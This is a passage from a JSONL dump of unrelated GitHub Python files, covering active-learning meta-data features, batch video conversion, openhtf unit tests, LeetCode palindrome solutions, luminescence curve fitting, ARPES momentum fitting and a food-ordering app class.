[unlabel_indexs[5][sorted_unlabelperdiction_index][int(i * current_unlabel_size)] for i in np.arange(0, 1, 0.1)]\n\n \n distance_query_data = None\n cc_sort_index = []\n\n for i in query_index:\n i_cc = []\n i_l10e = []\n i_u10e = []\n for j in range(10):\n # cal the ith in query_index about \n # i_cc.append(np.linalg.norm(X[i] - data_cluster_centers_10[j]))\n # i_l10e.append(np.linalg.norm(X[i] - label_10_equal[j]))\n # i_u10e.append(np.linalg.norm(X[i] - unlabel_10_equal[j]))\n i_cc.append(distance[i][cluster_center_index[j]])\n i_l10e.append(distance[i][label_10_equal_index[j]])\n i_u10e.append(distance[i][unlabel_10_equal_index[j]])\n\n i_cc = minmax_scale(i_cc)\n i_cc_sort_index = np.argsort(i_cc)\n cc_sort_index.append(i_cc_sort_index)\n i_l10e = minmax_scale(i_l10e)\n i_u10e = minmax_scale(i_u10e)\n i_distance = np.hstack((i_cc[i_cc_sort_index], i_l10e, i_u10e))\n if distance_query_data is None:\n distance_query_data = i_distance\n else:\n distance_query_data = np.vstack((distance_query_data, i_distance))\n\n ratio_tn = []\n ratio_fp = []\n ratio_fn = []\n ratio_tp = []\n label_pre_10_equal = []\n labelmean = []\n labelstd = []\n unlabel_pre_10_equal = []\n round5_ratio_unlabel_positive = []\n round5_ratio_unlabel_negative = []\n unlabelmean = []\n unlabelstd = [] \n for i in range(6):\n label_size = len(label_indexs[i])\n unlabel_size = len(unlabel_indexs[i])\n # cur_prediction = modelPredictions[i]\n cur_prediction = np.array([1 if k>0 else -1 for k in modelPredictions[i]])\n label_ind = label_indexs[i]\n unlabel_ind = unlabel_indexs[i]\n\n tn, fp, fn, tp = confusion_matrix(y[label_ind], cur_prediction[label_ind], labels=[-1, 1]).ravel()\n ratio_tn.append(tn / label_size)\n ratio_fp.append(fp / label_size)\n ratio_fn.append(fn / label_size)\n ratio_tp.append(tp / label_size)\n\n sort_label_pred = np.sort(minmax_scale(cur_prediction[label_ind]))\n i_label_10_equal = [sort_label_pred[int(i * label_size)] for i in np.arange(0, 1, 0.1)]\n label_pre_10_equal = np.r_[label_pre_10_equal, i_label_10_equal]\n labelmean.append(np.mean(i_label_10_equal))\n labelstd.append(np.std(i_label_10_equal))\n\n round5_ratio_unlabel_positive.append((sum(current_prediction[unlabel_ind] > 0)) / unlabel_size)\n round5_ratio_unlabel_negative.append((sum(current_prediction[unlabel_ind] < 0)) / unlabel_size)\n sort_unlabel_pred = np.sort(minmax_scale(cur_prediction[unlabel_ind]))\n i_unlabel_10_equal = [sort_unlabel_pred[int(i * unlabel_size)] for i in np.arange(0, 1, 0.1)]\n unlabel_pre_10_equal = np.r_[unlabel_pre_10_equal, i_unlabel_10_equal]\n unlabelmean.append(np.mean(i_unlabel_10_equal))\n unlabelstd.append(np.std(i_unlabel_10_equal))\n model_infor = np.hstack((ratio_tp, ratio_fp, ratio_tn, ratio_fn, label_pre_10_equal, labelmean, labelstd, \\\n round5_ratio_unlabel_positive, round5_ratio_unlabel_negative, unlabel_pre_10_equal, unlabelmean, unlabelstd))\n model_infor_data = model_infor * np.ones_like(n_feature_data)\n\n fx_data = None\n k = 0\n for i in query_index:\n f_x_a = []\n # f_x_b = []\n f_x_c = []\n f_x_d = []\n # print('data_cluster_centers_10_index[cc_sort_index[k]]', data_cluster_centers_10_index[cc_sort_index[k]])\n for round in range(6):\n predict = minmax_scale(modelPredictions[round])\n for j in range(10):\n f_x_a.append(predict[i] - predict[cluster_center_index[cc_sort_index[k][j]]])\n for j in range(10):\n f_x_c.append(predict[i] - predict[label_10_equal_index[j]])\n for j in range(10):\n f_x_d.append(predict[i] - predict[unlabel_10_equal_index[j]])\n fdata = np.hstack((current_prediction[i], f_x_a, f_x_c, f_x_d))\n if fx_data is None:\n fx_data = fdata\n else:\n fx_data = np.vstack((fx_data, fdata))\n k += 1\n\n metadata = np.hstack((n_feature_data, ratio_label_positive_data, ratio_label_negative_data, \\\n ratio_unlabel_positive_data, ratio_unlabel_negative_data, distance_query_data, model_infor_data, fx_data))\n print('The shape of meta_data: ', np.shape(metadata))\n return metadata\n\ndef mate_data_1(X, y, distance, cluster_center_index, label_indexs, unlabel_indexs, modelOutput, query_index):\n \"\"\"Calculate the meta data according to the current model,dataset and five rounds before information.\n\n\n Parameters\n ----------\n X: 2D array\n Feature matrix of the whole dataset. It is a reference which will not use additional memory.\n\n y: {list, np.ndarray}\n The true label of the each round of iteration,corresponding to label_indexs.\n \n distance: 2D\n distance[i][j] reprensts the distance between X[i] and X[j].\n\n cluster_center_index: np.ndarray\n The index corresponding to the samples which is the result of cluster in origin data set. \n\n label_indexs: {list, np.ndarray} shape=(number_iteration, corresponding_label_index)\n The label indexs of each round of iteration,\n\n unlabel_indexs: {list, np.ndarray} shape=(number_iteration, corresponding_unlabel_index)\n The unlabel indexs of each round of iteration,\n\n modelOutput: {list, np.ndarray} shape=(number_iteration, corresponding_perdiction)\n\n query_index: int\n The unlabel sample will be queride,and calculate the performance improvement after add to the labelset.\n \n Returns\n -------\n metadata: 1d-array\n The meta data about the current model and dataset.\n \"\"\"\n if(np.any(cluster_center_index == -1)):\n raise IndexError(\"cluster_center_index is wrong\")\n for i in range(5):\n assert(np.shape(X)[0] == np.shape(modelOutput[i])[0]) \n if(not isinstance(label_indexs[i], np.ndarray)):\n label_indexs[i] = np.array(label_indexs[i])\n if(not isinstance(unlabel_indexs[i], np.ndarray)):\n unlabel_indexs[i] = np.array(unlabel_indexs[i])\n \n n_samples, n_feature = np.shape(X)\n\n current_label_size = len(label_indexs[5])\n current_label_y = y[label_indexs[5]]\n current_unlabel_size = len(unlabel_indexs[5])\n current_prediction = modelOutput[5]\n\n ratio_label_positive = (sum(current_label_y > 0)) / current_label_size\n ratio_label_negative = (sum(current_label_y < 0)) / current_label_size\n\n ratio_unlabel_positive = (sum(current_prediction[unlabel_indexs[5]] > 0)) / current_unlabel_size\n ratio_unlabel_negative = (sum(current_prediction[unlabel_indexs[5]] < 0)) / current_unlabel_size\n\n sorted_labelperdiction_index = np.argsort(current_prediction[label_indexs[5]])\n sorted_current_label_data = X[label_indexs[5][sorted_labelperdiction_index]]\n \n label_10_equal_index = [label_indexs[5][sorted_labelperdiction_index][int(i * current_label_size)] for i in np.arange(0, 1, 0.1)]\n\n sorted_unlabelperdiction_index = np.argsort(current_prediction[unlabel_indexs[5]])\n sorted_current_unlabel_data = X[unlabel_indexs[5][sorted_unlabelperdiction_index]]\n unlabel_10_equal_index = [unlabel_indexs[5][sorted_unlabelperdiction_index][int(i * current_unlabel_size)] for i in np.arange(0, 1, 0.1)]\n \n cc = []\n l10e = []\n u10e = []\n for j in range(10):\n cc.append(distance[query_index][cluster_center_index[j]])\n l10e.append(distance[query_index][label_10_equal_index[j]])\n u10e.append(distance[query_index][unlabel_10_equal_index[j]])\n\n cc = minmax_scale(cc)\n cc_sort_index = np.argsort(cc)\n l10e = minmax_scale(l10e)\n u10e = minmax_scale(u10e)\n distance_query_data = np.hstack((cc[cc_sort_index], l10e, u10e))\n\n ratio_tn = []\n ratio_fp = []\n ratio_fn = []\n ratio_tp = []\n label_pre_10_equal = []\n labelmean = []\n labelstd = []\n unlabel_pre_10_equal = []\n round5_ratio_unlabel_positive = []\n round5_ratio_unlabel_negative = []\n unlabelmean = []\n unlabelstd = [] \n for i in range(6):\n label_size = len(label_indexs[i])\n unlabel_size = len(unlabel_indexs[i])\n # cur_prediction = modelOutput[i]\n cur_prediction = np.array([1 if k>0 else -1 for k in modelOutput[i]])\n label_ind = label_indexs[i]\n unlabel_ind = unlabel_indexs[i]\n\n tn, fp, fn, tp = confusion_matrix(y[label_ind], cur_prediction[label_ind], labels=[-1, 1]).ravel()\n ratio_tn.append(tn / label_size)\n ratio_fp.append(fp / label_size)\n ratio_fn.append(fn / label_size)\n ratio_tp.append(tp / label_size)\n\n sort_label_pred = np.sort(minmax_scale(modelOutput[i][label_ind]))\n i_label_10_equal = [sort_label_pred[int(i * label_size)] for i in np.arange(0, 1, 0.1)]\n label_pre_10_equal = np.r_[label_pre_10_equal, i_label_10_equal]\n labelmean.append(np.mean(i_label_10_equal))\n labelstd.append(np.std(i_label_10_equal))\n\n round5_ratio_unlabel_positive.append((sum(current_prediction[unlabel_ind] > 0)) / unlabel_size)\n round5_ratio_unlabel_negative.append((sum(current_prediction[unlabel_ind] < 0)) / unlabel_size)\n sort_unlabel_pred = np.sort(minmax_scale(modelOutput[i][unlabel_ind]))\n i_unlabel_10_equal = [sort_unlabel_pred[int(i * unlabel_size)] for i in np.arange(0, 1, 0.1)]\n unlabel_pre_10_equal = np.r_[unlabel_pre_10_equal, i_unlabel_10_equal]\n unlabelmean.append(np.mean(i_unlabel_10_equal))\n unlabelstd.append(np.std(i_unlabel_10_equal))\n model_infor = np.hstack((ratio_tp, ratio_fp, ratio_tn, ratio_fn, label_pre_10_equal, labelmean, labelstd, \\\n round5_ratio_unlabel_positive, round5_ratio_unlabel_negative, unlabel_pre_10_equal, unlabelmean, unlabelstd))\n\n f_x_a = []\n f_x_c = []\n f_x_d = []\n for round in range(6):\n model_output = minmax_scale(modelOutput[round])\n for j in range(10):\n f_x_a.append(model_output[query_index] - model_output[cluster_center_index[cc_sort_index[j]]])\n for j in range(10):\n f_x_c.append(model_output[query_index] - model_output[label_10_equal_index[j]])\n for j in range(10):\n f_x_d.append(model_output[query_index] - model_output[unlabel_10_equal_index[j]])\n fdata = np.hstack((current_prediction[query_index], f_x_a, f_x_c, f_x_d))\n\n metadata = np.hstack((n_feature, ratio_label_positive, ratio_label_negative, \\\n ratio_unlabel_positive, ratio_unlabel_negative, distance_query_data, model_infor, fdata))\n return metadata\n\ndef model_select(modelname):\n \"\"\"\n Parameters\n ----------\n modelname: str\n The name of model.\n 'KNN', 'LR', 'RFC', 'RFR', 'DTC', 'DTR', 'SVM', 'GBDT'\n\n Returns\n -------\n model: sklearn model\n The model in sklearn with corresponding parameters.\n \"\"\"\n\n if modelname not in ['KNN', 'LR', 'RFC', 'RFR', 'DTC', 'DTR', 'SVM', 'GBDT']:\n raise ValueError(\"There is no \" + modelname)\n\n if modelname == 'KNN':\n from sklearn.neighbors import KNeighborsClassifier \n models = []\n n_neighbors_parameter = [5, 8, 11, 14, 17, 20]\n algorithm_parameter = ['auto', 'ball_tree', 'kd_tree', 'brute']\n leaf_size_parameter = [20, 25, 30, 35, 40, 45, 50]\n p_parameter = [1, 2, 3]\n for n in n_neighbors_parameter:\n for a in algorithm_parameter:\n for l in leaf_size_parameter:\n for p in p_parameter:\n models.append(KNeighborsClassifier(n_neighbors=n, algorithm=a, leaf_size=l, p=p))\n return models \n\n if modelname == 'LR':\n from sklearn.linear_model import LogisticRegression\n models = []\n # penalty_parameter = ['l1', 'l2']\n C_parameter = [1e-2, 1e-1, 0.5, 1, 1.5]\n tol_parameter = [1e-5, 1e-4, 1e-3]\n solver_parameter = ['newton-cg', 'lbfgs', 'liblinear', 'sag', 'saga']\n max_iter_parameter = [50, 100, 150, 200]\n for c in C_parameter:\n for t in tol_parameter:\n for s in solver_parameter:\n for m in max_iter_parameter:\n models.append(LogisticRegression(C=c, tol=t, solver=s, max_iter=m))\n return models\n\n if modelname == 'RFC':\n from sklearn.ensemble import RandomForestClassifier\n models = []\n n_estimators_parameter = [10, 40, 70, 110, 150, 200, 250, 300]\n max_features_parameter = ['auto', 'sqrt', 'log2', None]\n for n in n_estimators_parameter:\n for m in max_features_parameter:\n models.append(RandomForestClassifier(n_estimators=n, max_features=m))\n return models\n \n if modelname == 'RFR':\n from sklearn.ensemble import RandomForestRegressor\n models = []\n n_estimators_parameter = [10, 40, 70, 110, 150, 200, 250, 300]\n max_features_parameter = ['auto', 'sqrt', 'log2', None]\n for n in n_estimators_parameter:\n for m in max_features_parameter:\n models.append(RandomForestRegressor(n_estimators=n, max_features=m))\n return models\n \n if modelname == 'DTC':\n from sklearn.tree import DecisionTreeClassifier\n models = []\n splitter_parameter = ['best', 'random']\n max_features_parameter = ['auto', 'sqrt', 'log2', None]\n for s in splitter_parameter:\n for m in max_features_parameter:\n models.append(DecisionTreeClassifier(splitter=s, max_features=m))\n return models\n\n if modelname == 'DTR':\n from sklearn.tree import DecisionTreeRegressor\n models = []\n splitter_parameter = ['best', 'random']\n max_features_parameter = ['auto', 'sqrt', 'log2', None]\n for s in splitter_parameter:\n for m in max_features_parameter:\n models.append(DecisionTreeRegressor(splitter=s, max_features=m))\n return models \n\n if modelname == 'SVM':\n from sklearn.svm import SVC\n models = []\n C_parameter = [1e-2, 1e-1, 0.5, 1, 1.5]\n kernel_parameter = ['linear', 'poly', 'rbf', 'sigmoid']\n degree_parameter = [2, 3, 4, 5]\n tol_parameter = [1e-5, 1e-4, 1e-3]\n for c in C_parameter:\n for k in kernel_parameter:\n for d in degree_parameter:\n for t in tol_parameter:\n models.append(SVC(C=c ,kernel=k, degree=d, tol=t, probability=True))\n return models\n\n\n if modelname == 'GBDT':\n from sklearn.ensemble import GradientBoostingClassifier\n models = []\n loss_parameter = ['deviance', 'exponential']\n learning_rate_parameter = [0.02, 0.05, 0.1, 0.15]\n n_estimators_parameter = [40, 70, 110, 150, 200, 250, 300]\n max_depth_parameter = [2, 3, 5]\n max_features_parameter = ['auto', 'sqrt', 'log2', None]\n for l in loss_parameter:\n for le in learning_rate_parameter:\n for n in n_estimators_parameter:\n for md in max_depth_parameter:\n for mf in max_features_parameter:\n models.append(GradientBoostingClassifier(loss=l, learning_rate=le, n_estimators=n, max_depth=md, max_features=mf))\n return models \n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n\n X, y = make_classification(n_samples=1000, n_features=5, n_classes=2)\n y[y==0] = -1\n d = DataSet(X=X, y=y, dataset_name='test')\n cd, cdi = d.get_cluster_center()\n distance = d.get_distance()\n\n train, test, l_ind, u_ind = d.split_data(split_count=6)\n\n # print(np.shape(train))\n # print(np.shape(l_ind))\n\n # print(np.shape(u_ind))\n # print(l_ind[5])\n \n models = []\n decision_value = []\n prediction = []\n\n # model = SVC(probability=True)\n # model.fit(X[l_ind[0]], y[l_ind[0]])\n\n # pre = model.predict_proba(X)\n # print(np.shape(pre))\n # print(np.shape(pre[:, 1]))\n # de = model.decision_function(X)\n # print(np.shape(de))\n # print(pre[0:5, 1])\n # print(pre[0:5, 0])\n # print(de[0:5])\n \n # print(np.shape(de[:, 1]))\n\n for i in range(6):\n model = SVC()\n model.fit(X[l_ind[i]], y[l_ind[i]])\n # prediction.append(model.predict_proba(X)[:, 1])\n decision_value.append(model.decision_function(X))\n models.append(model)\n \n query_index = [30]\n query_index = np.array(query_index)\n meta = mate_data_1(X, y, distance, cdi, l_ind, u_ind, decision_value, 50)\n","repo_name":"Lggggggx/baseline","sub_path":"LAL/baseline/meta_data.py","file_name":"meta_data.py","file_ext":"py","file_size_in_byte":32114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17976806724","text":"import pandas as pd\nfrom joblib import Parallel,delayed\nimport subprocess\nimport os\nimport glob\n\n\n\nfilenames = glob.glob(os.path.join('/data/PV_VQA_Study/all_cut_upscaled_hfr_motioninterpolated_yuv_vids/','*'))\nprint(filenames)\ndef run_ffmpeg(filenames,i):\n input_vid = filenames[i]\n out_mp4_vid = os.path.join('/data/PV_VQA_Study/all_cut_upscaled_hfr_motioninterpolated_y4m_vids',os.path.splitext(os.path.basename(input_vid))[0]+'.y4m')\n if(os.path.exists(out_mp4_vid)):\n return\n command = ['./cvt2y4m.sh',input_vid,out_mp4_vid,fps,w,h]\n print(command)\n os.system(' '.join(command))\n return\n\n\nParallel(n_jobs=32)(delayed(run_ffmpeg)(filenames,i) for i in range(len(filenames)))\n#for i in range(len(filenames)):\n# run_ffmpeg(filenames,i)\n","repo_name":"JoshuaEbenezer/lbmfr-public","sub_path":"data_gen_code/cvt_all_y4m2yuv.py","file_name":"cvt_all_y4m2yuv.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"21097586019","text":"import copy\nimport time\nimport unittest\nfrom unittest import mock\n\nfrom openhtf import util\nfrom openhtf.util import timeouts\n\n\nclass TestUtil(unittest.TestCase):\n\n def setUp(self):\n super(TestUtil, self).setUp()\n self.timeout = 60\n self.polledtimeout = timeouts.PolledTimeout(self.timeout)\n\n @mock.patch.object(time, 'time')\n def test_time_expired_false(self, mock_time):\n elapsed = 3\n mock_time.side_effect = [1, 1 + elapsed, 2 + elapsed]\n\n self.polledtimeout.restart()\n sec = self.polledtimeout.seconds\n self.assertLessEqual(sec, self.timeout - elapsed)\n self.assertFalse(self.polledtimeout.has_expired())\n\n def test_time_expired_true(self):\n self.polledtimeout.expire()\n self.assertTrue(self.polledtimeout.has_expired())\n\n def test_partial_format(self):\n original = ('Apples are {apple[color]} and {apple[taste]}. '\n 'Pears are {pear.color} and {pear.taste}. '\n 'Oranges are {orange_color} and {orange_taste}.')\n text = copy.copy(original)\n\n apple = {\n 'color': 'red',\n 'taste': 'sweet',\n }\n\n class Pear(object):\n color = 'green'\n taste = 'tart'\n\n pear = Pear()\n\n # Partial formatting\n res = util.partial_format(text, apple=apple)\n res = util.partial_format(res, pear=pear)\n self.assertEqual(\n 'Apples are red and sweet. Pears are green and tart. '\n 'Oranges are {orange_color} and {orange_taste}.', res)\n\n # Format rest of string\n res = util.partial_format(res, orange_color='orange', orange_taste='sour')\n self.assertEqual(\n 'Apples are red and sweet. Pears are green and tart. '\n 'Oranges are orange and sour.', res)\n\n # The original text has not changed\n self.assertEqual(original, text)\n\n # Make sure no unexpected problems with an empty string\n empty_string = ''\n self.assertEqual('', util.partial_format(empty_string))\n self.assertEqual('', util.partial_format(empty_string, foo='bar'))\n","repo_name":"google/openhtf","sub_path":"test/util/util_test.py","file_name":"util_test.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":454,"dataset":"github-code","pt":"81"} +{"seq_id":"39603462535","text":"class Solution:\n def longestPalindrome(self, s: str) -> str:\n T = '#'.join('@{}%'.format(s))\n n, C, R = len(T), 0, 0\n P = [0] * n\n for i in range(1, n - 1):\n P[i] = min(R - i, P[C - (i - C)]) if R > i else 0\n while T[i + 1 + P[i]] == T[i - 1 - P[i]]:\n P[i] += 1\n if i + P[i] > R:\n C, R = i, i + P[i]\n maxLen, center = 0, 0\n for i, p in enumerate(P):\n if p > maxLen:\n maxLen, center = p, i\n return s[(center - maxLen) // 2 : (center + maxLen) // 2]\n\n\nclass Solution(object):\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n if len(s) <= 1:\n return s\n maxLen = 1\n head = 0\n for i in xrange(len(s)):\n if i - maxLen >= 1 and s[i-maxLen-1:i+1] == s[i-maxLen-1:i+1][::-1]:\n head = i - maxLen - 1\n maxLen += 2\n continue\n if i - maxLen >= 0 and s[i-maxLen:i+1] == s[i-maxLen:i+1][::-1]:\n head = i - maxLen\n maxLen += 1\n return s[head:head + maxLen]\n\nclass Solution:\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n res = ''\n n = len(s)\n dp = [[False for cols in range(n)] for rows in range(n)]\n for i in range(n - 1, -1, -1):\n for j in range(i, n):\n dp[i][j] = s[i] == s[j] and (j - i < 3 or dp[i + 1][j - 1])\n if dp[i][j] and j - i + 1 > len(res):\n res = s[i:j + 1]\n return res\n","repo_name":"allenhyp/LeetCodePractice","sub_path":"005_Longest_Palindromic_Substring.py","file_name":"005_Longest_Palindromic_Substring.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25352657","text":"import pandas as pd\n\nfrom model import *\nfrom old.isocal import *\nfrom scores import *\n\n\ndef measure_tests():\n a = pd.Series([0.9, 0.7, 0.1, 0.2])\n b = pd.Series([1, 0, 0, 1])\n df = pd.DataFrame({\"score\": a, \"cl\": b})\n assert accuracy(df) == 0.5\n assert roc_auc(df) == 0.75\n assert bs(df) == 0.2875\n assert round(logloss(df), 4) == 0.7560\n\n\ndef isocal_test2():\n scores = [0, 0, 0, 0, 0, 0, 0, 0.5, 0.5, 1, 1, 1, 1]\n classes = [0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1]\n ic = IsotonicCalibration(None)\n cal_pairs = ic.fit_isotonic_regression(scores, classes)\n ic.cal_model = ic.isotonic_regression_model(cal_pairs)\n for p in cal_pairs:\n print(p.sc, p.csc, p.fsc, p.cl, ic.predict(p.sc))\n\ndef isocal_test():\n scores = [2.7, 0.5, 1.2, 2.2, 0.7, 0.3]\n classes = [1, 1, 0, 1, 0, 0]\n ic = IsotonicCalibration(None)\n cal_pairs = ic.fit_isotonic_regression(scores, classes)\n model = ic.isotonic_regression_model(cal_pairs)\n ic.cal_model = model\n res = ic.predict(2)\n for i in [0, 0.4, 0.8, 1.2, 1.6, 2.0, 2.4]:\n print(ic.predict(i))\n assert round(res, 2) == round(13/15, 2)\n\n\ndef isocal_test3():\n scores = [2.7, 0.4, 0.4, 0.4, 1.2, 2.2, 0.7, 0.3]\n classes = [1, 1, 1, 0, 0, 1, 0, 0]\n ic = IsotonicCalibration(None)\n cal_pairs = ic.fit_isotonic_regression(scores, classes)\n model = ic.isotonic_regression_model(cal_pairs)\n ic.cal_model = model\n for i in [0.3, 0.5, 0.7, 1.2, 2.2, 2.7]:\n print(ic.predict(i))\n\n\n\ndef tests():\n measure_tests()\n isocal_test()\n isocal_test2()\n isocal_test3()\n\n\n\nif __name__ == \"__main__\":\n tests()","repo_name":"mlkruup/bayesiso","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"74013663304","text":"r\"\"\"Contains models and utilities for \"curve fitting\" the forward momentum conversion function.\n\nThis allows for rapid fine tuning of the angle offsets used in momentum conversion.\n\nIf the user calculates, places, or curve fits for the high symmetry\nlocations in the data $H_i(\\phi,\\psi,\\theta,\\beta,\\chi)$, these can be used\nas waypoints to find a set of $\\Delta\\phi$, $\\Delta\\theta$, $\\Delta\\chi$, etc.\nthat minimize\n\n$$\n\\sum_i \\text{min}_j |text{P}(H_i, \\Delta\\phi, \\Delta\\theta, \\ldots) - S_j|^2\n$$\n\nwhere $S_j$ enumerates the high symmetry points of the known Brillouin zone, and $\\text{P}$\nis the function that maps forwards from angle to momenta. This can also\nbe used to calculate moiré information, but using the (many) available\nhigh symmetry points of the moiré superlattice to get a finer estimate of\nrelative angle alignment, lattice incommensuration, and strain than is possible\nusing the constituent lattices and Brillouin zones.\n\"\"\"\n\nimport numpy as np\n\nfrom arpes.utilities.conversion.forward import convert_coordinates\n\n\n__all__ = (\"HighSymmetryPointModel\",)\n\n\ndef k_points_residual(paramters, coords_dataset, high_symmetry_points, dimensionality=2):\n momentum_coordinates = convert_coordinates(coords_dataset)\n if dimensionality == 2:\n return np.asarray(\n [\n np.diagonal(momentum_coordinates.kx.values),\n np.diagonal(momentum_coordinates.ky.values),\n ]\n )\n else:\n return np.asarray(\n [\n np.diagonal(momentum_coordinates.kx.values),\n np.diagonal(momentum_coordinates.ky.values),\n np.diagonal(momentum_coordinates.kz.values),\n ]\n )\n\n\ndef minimum_forward_error(\n coordinate_samples,\n phi_offset=0,\n psi_offset=0,\n theta_offset=0,\n beta_offset=0,\n chi_offset=0,\n high_symmetry_points=None,\n):\n r\"\"\"Sets offsets for a coordinate sample dataset before converting them all to momentum.\n\n Then, for each sample, the closest high symmetry point among the provided\n `high_symmetry_points` is calculated, and the distance to the high symmetry point obtained.\n The distance of each of the coordinate samples to these symmetry points is returned, and the\n optimizer adjusts the offsets to find a \"best\" set in the sense of least total L2 distance\n to the symmetry points.\n\n If the coordinate samples are labelled as described above as H_i, then we return\n\n $$\n \\text{min}_j |text{P}(H_i, \\Delta\\phi, \\Delta\\theta, \\ldots) - S_j|\n $$\n\n and the optimizer attempts to optimize for\n\n $$\n \\sum_i \\left((\\text{min}_j |text{P}(H_i, \\Delta\\phi, \\Delta\\theta, \\ldots) - S_j|^2)\\right)^2.\n $$\n\n We can therefore control the metric by returning a different distance back to the optimizer, if desired.\n For instance, the L1 distance can be optimized if desired by instead returning\n\n $$\n \\text{min}_j |text{P}(H_i, \\Delta\\phi, \\Delta\\theta, \\ldots) - S_j|^\\frac{1}{2}\n $$\n\n Args:\n coordinate_samples: (N, 6 + 1)\n phi_offset\n psi_offset\n theta_offset\n beta_offset\n chi_offset\n high_symmetry_points\n\n Returns:\n The MSE distance error for this set of coordinate offsets.\n \"\"\"\n pass\n","repo_name":"chstan/arpes","sub_path":"arpes/fits/zones.py","file_name":"zones.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"81"} +{"seq_id":"1735757044","text":"# Analysis of 3-component LM-OSL signal\r\nfrom scipy import optimize\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom prettytable import PrettyTable\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\ndata = np.loadtxt('CaF2LMOSL.txt')\r\nx_data,y_data = data[:, 0], data[:, 1] \r\ndef LM(x,N,tau):\r\n u=np.abs(N)*(x/P)*(np.exp(-(x**2.0)\\\r\n /(2*P*abs(tau))))\r\n return u\r\ndef total_FOKLM(x, *inis): \r\n u=np.array([0 for i in range(len(x_data))])\r\n Ns, taus = inis[0:nPks], inis[nPks:2*nPks]\r\n for i in range(nPks): \r\n u=u+LM(x,Ns[i],taus[i])\r\n u=u+bgd*x/P\r\n return u\r\nnPks= 3 \r\nP=int(max(x_data))\r\nt=np.linspace(0,P,P)\r\ninis=[1400,1,800,.1,500,.01]\r\nbgd=y_data[-1]\r\nparams,cov =optimize.curve_fit(total_FOKLM,x_data,\\\r\ny_data,p0=inis)\r\nparams, cov = optimize.curve_fit(total_FOKLM,\\\r\nx_data,y_data,p0=inis,maxfev=10000) \r\nplt.scatter(x_data, y_data,c='r',label=r'CaF$_2$:Mn LM-OSL')\r\nplt.plot(x_data, total_FOKLM(x_data, \r\n *params),c='black',label='Original FOK-LM eqt',linewidth=1)\r\ntotalArea=sum(total_FOKLM(x_data, *params))\r\nsums,pc=[0]*nPks, [0]*nPks\r\nfor i in range(0,nPks): \r\n FOKLMi=LM(x_data, params[i],params[nPks+i])\r\n sums[i]=np.sum(FOKLMi)\r\n plt.plot(x_data,FOKLMi)\r\nplt.plot(t,bgd*t/P)\r\nfor j in range(nPks):\r\n pc[j]=round(100*sums[j]/totalArea,1) \r\npcbgd=round(100*sum(bgd*x_data/P)/totalArea)\r\nleg = plt.legend()\r\nleg.get_frame().set_linewidth(0.0) \r\nplt.ylabel('LM-OSL [a.u.]')\r\nplt.xlabel(r'Stimulation time [s]')\r\nres=total_FOKLM(x_data, *params)-y_data\r\nFOM=round(100*np.sum(abs(res))/np.sum(y_data),1)\r\nprint('FOM=',FOM,' %')\r\nplt.show()\r\nNs=[round(x,1) for x in params[0:nPks]]\r\ntaus=[round(x,2) for x in params[nPks:2*nPks]] \r\ndN=[round(np.sqrt(cov[x][x]),1) for x in range(3)]\r\ndtaus=[round(np.sqrt(cov[x][x]),2) for x in range(3,6)]\r\nmyTable = PrettyTable([ \"N (a.u.)\",\"dN (a.u)\",\\\r\n'tau (s)',\"dtau (s)\",\"Area [%]\"]) \r\nfor j in range(nPks):\r\n myTable.add_row([Ns[j],dN[j],taus[j],dtaus[j],pc[j]])\r\nmyTable.add_row(['','','','','bgd='+str(pcbgd)+'%'])\r\nprint(myTable)","repo_name":"vpagonis/Python-Codes","sub_path":"Ch9PagonisGitHub/Code 9.6.py","file_name":"Code 9.6.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41051239538","text":"from project import client\nfrom project.client import Client\nfrom project.meals.meal import Meal\n\n\nclass FoodOrdersApp:\n\n VALID_MEALS = (\n \"Starter\",\n \"MainDish\",\n \"Dessert\",\n )\n\n def __init__(self):\n self.menu = []\n self.clients_list = []\n self.receipt_id = 1\n\n def register_client(self, client_phone_number: str):\n try:\n client = next(filter(lambda c: c.phone_number == client_phone_number, self.clients_list))\n except StopIteration:\n raise Exception(\"The client has already been registered!\")\n\n self.clients_list.append(client.client_phone_number)\n return f\"Client {client_phone_number} registered successfully.\"\n\n def add_meals_to_menu(self, *meals: Meal):\n meals = [meal for meal in meals if meal.__class__.__name__ in self.VALID_MEALS]\n self.menu.append(meals)\n\n def show_menu(self):\n if len(self.menu) < 5:\n raise Exception(\"The menu is not ready!\")\n\n return '\\n'.join(str(meal.details()) for meal in self.menu)\n\n def __get_or_create_client(self, client_phone_number):\n for client in self.clients_list:\n if client.phone_number == client_phone_number:\n return client\n\n new_client = Client(client_phone_number)\n self.clients_list.append(new_client)\n return new_client\n\n def __get_menu(self):\n return {meal.name: meal for meal in self.menu}\n\n def add_meals_to_shopping_cart(self, client_phone_number: str, **meal_names_and_quantities):\n if len(self.menu) < 5:\n raise Exception(\"The menu is not ready!\")\n\n find_client = self.__get_or_create_client(client_phone_number)\n menu_info = self.__get_menu()\n\n for meal in meal_names_and_quantities:\n if meal not in self.menu:\n raise Exception(f\"{meal.meal_name} is not on the menu!\")\n\n for meal_name, quantity in meal_names_and_quantities.items():\n if menu_info[meal_name].quantity < quantity:\n raise Exception(f\"Not enough quantity of {menu_info[meal].__class__.__name__}: {meal}!\")\n\n for meal_name, quantity in meal_names_and_quantities.items():\n menu_info[meal_name].quantity -= quantity\n 